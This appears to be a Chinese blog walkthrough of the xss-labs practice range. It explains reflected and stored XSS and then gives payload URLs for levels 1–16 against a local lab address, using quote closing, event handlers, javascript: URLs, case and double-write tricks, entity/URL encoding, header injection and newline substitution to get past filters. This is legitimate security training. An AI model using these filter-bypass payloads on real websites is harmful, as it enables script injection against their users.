首页 > 其他分享 >实战篇——XSS漏洞xss-labs-master靶场实战一

实战篇——XSS漏洞xss-labs-master靶场实战一

时间:2024-07-08 23:31:16浏览次数:18  
标签:XSS 实战篇 http xss 192.168 labs 118.150 master

实战篇——XSS漏洞xss-labs-master靶场实战(1)

XSS的分类

(1) 反射型XSS

攻击者通过电子邮件等方式将恶意链接发送给目标用户。当目标用户点击该链接时,服务器接收该目标用户的请求并把带有恶意脚本的页面发送给目标用户的浏览器,浏览器解析页面时就会执行恶意脚本。

(2) 存储型XSS

攻击者将恶意脚本注入到留言板中并保存,恶意脚本被永久地存储在服务器的数据库中 。 当其他用户浏览包含这条恶意留言的页面时,恶意脚本就会在浏览器中得到执行 。

XSS靶场实战

level1:

http://192.168.118.150/xss-labs-master/level1.php?name=<script>alert(1);</script>

level2:

image-20240708221850468

image-20240708221925231

据此判断为双引号闭合。

http://192.168.118.150/xss-labs-master/level2.php?keyword="> <script>alert(1);</script>

level3:

image-20240708222219260

image-20240708222243275

据此判断为单引号闭合或单引号闭合+html实体编码。

image-20240708222413634

据此判断存在html实体编码。

可以使用onmouseover等事件触发,但还需要闭合单引号:

image-20240708222714373

http://192.168.118.150/xss-labs-master/level3.php?keyword=' onm ouseover='alert(1);

level4:

http://192.168.118.150/xss-labs-master/level4.php?keyword=" onm ouseover="alert(1);

level5:

使用javascript伪协议

http://192.168.118.150/xss-labs-master/level5.php?keyword="> <a href="javascript:alert(1);">click here!</a> <img src="

level6:

大小写绕过

http://192.168.118.150/xss-labs-master/level6.php?keyword="> <SCRIPT>alert(1);</SCRIPT>

level7:

双写绕过

http://192.168.118.150/xss-labs-master/level7.php?keyword="> <sscriptcript>alert(1);</sscriptcript>

level8:

image-20240708224817188

javascript被替换,可以使用html实体编码:

image-20240708225028858

但此时依然无法成功弹框,需要对&和#进行url编码:

image-20240708225151990

点击链接即可弹框:

image-20240708225248514

http://192.168.118.150/xss-labs-master/level8.php?keyword=javascrip%26%23x74:alert(1);

level9:

image-20240708225431789

image-20240708225459788

可见参数必须包含http://。

在上一题的基础上使用注释符//连接http://即可:

image-20240708225646175

http://192.168.118.150/xss-labs-master/level9.php?keyword=javascrip%26%23x74:alert(1);//http://

level10:

http://192.168.118.150/xss-labs-master/level10.php?t_sort=" onm ouseover=alert(1); type="text

level11:

利用referer

image-20240708230559484

level12:

利用user-agent

image-20240708230835405

level13:

利用cookie.user,唯一需要注意的是需要删除;,否则将发生截断

image-20240708231240703

level16:

image-20240708232503471

可见script和/都被替换。

可以使用img标签:

image-20240708232702975

可见' '也被替换。

使用回车代替空格:

image-20240708232828079

http://192.168.118.150/xss-labs-master/level16.php?keyword=<img%0asrc=0%0aonerror=alert(1);>

标签:XSS,实战篇,http,xss,192.168,labs,118.150,master
From: https://www.cnblogs.com/yaoguyuan/p/18290884

相关文章

  • 实战篇——文件包含漏洞一
    实战篇——文件包含漏洞(1)本地文件包含本地文件包含一般需要依赖文件上传漏洞。如果文件上传漏洞限制上传文件的后缀必须为.jpg,那么配合本地文件包含,就可以通过上传图片木马获得服务器权限。上传图片木马:利用本地文件包含,成功连接一句话木马:可见本地文件包含最大的缺陷在......
  • 用SpringBoot打造坚固防线:轻松实现XSS攻击防御
    在这篇博客中,我们将深入探讨如何使用SpringBoot有效防御XSS攻击。通过结合注解和过滤器的方式,我们可以为应用程序构建一个强大的安全屏障,确保用户数据不被恶意脚本所侵害。目录什么是XSS攻击?SpringBoot中的XSS防御策略使用注解实现XSS防御使用过滤器实现XSS防御结合注解与过......
  • 实战篇——SQL注入sqli-labs-master靶场实战三
    实战篇——SQL注入sqli-labs-master靶场实战(3)sqlmap基础用法GET型:POST型:请求头注入(以User-Agent注入为例):爆库:pythonsqlmap.py-rC:\Users\yaogu\Desktop\sqlmap\request\1.txt--threads10--dbs爆表:pythonsqlmap.py-rC:\Users\yaogu\Desktop\sqlmap......
  • 实战篇——SQL注入sqli-labs-master靶场实战二
    实战篇——SQL注入sqli-labs-master靶场实战(2)SQL注入的高级利用(1)宽字节注入有时后端会对用户输入的特殊字符进行转义处理,这时普通的注入方式就会失效。对于成对的单引号'',可以通过十六进制编码的方式绕过转义;而对于单个的单引号',当数据库的编码格式为GBK时,就要用到宽字节......
  • 实战篇——SQL注入sqli-labs-master靶场实战一
    实战篇——SQL注入sqli-labs-master靶场实战(1)SQL注入的原理没有对用户的输入进行合法性判断或过滤,而是直接将其拼接至SQL查询语句当中作为命令执行,从而导致非法操作。SQL注入的检测也就是闭合方式的判断,根据报错信息的不同情况可以分为3类——(1)有报错信息(2)无报错信息,但......
  • XSS漏洞
    XSS漏洞什么是XSS?跨站脚本攻击,Cross-SiteScripting,为了和CSS(层叠样式表)区分开来,把第一个字母C改成了X,也就是现在所说的XSS攻击。XSS的危害窃取cookie,劫持对话,网络钓鱼,放马挖矿,广告刷流量,劫持后台,篡改页面,传播蠕虫,内网扫描。XSS作用位置用户输入作为script标签内容......
  • Web渗透:XSS-DOM-based XSS
    DOM-basedXSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。DOM的基本概念文档对象模型(DOM,Document......
  • Web安全中的XSS攻击详细教学(一),Xss-Labs靶场通关全教程(建议收藏)
    Web安全中的XSS攻击详细教学,Xss-Labs靶场通关全教程(建议收藏)漏洞原理xss(crosssitescript)跨站脚本攻击,指的是攻击者往web页面插入恶意脚本代码,当用户浏览时,嵌入web页面里的脚本代码就会执行,从而达到恶意攻击用户的特殊目的,它主要分为俩种类型1. 存储型XSS(持久型):攻击者将......
  • Web渗透:XSS-反射型&存储型
    跨站脚本攻击(Cross-SiteScripting,XSS)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到网页中,其他用户在浏览这些页面时,可能会执行这些恶意脚本,从而导致各种安全问题,如窃取用户信息、会话劫持等。产生原因:XSS漏洞其实就是一个前端漏洞,产生的根本原因是未对用户输入进行......
  • 【第19章】Vue实战篇之主页面
    文章目录前言一、代码1.主界面代码2.App.vue二、展示总结前言登录完成之后,应该自动跳转到主页面,接下来我们搭建主界面。一、代码1.主界面代码<scriptsetup>import{Management,Promotion,UserFilled,User,Crop,EditPen,......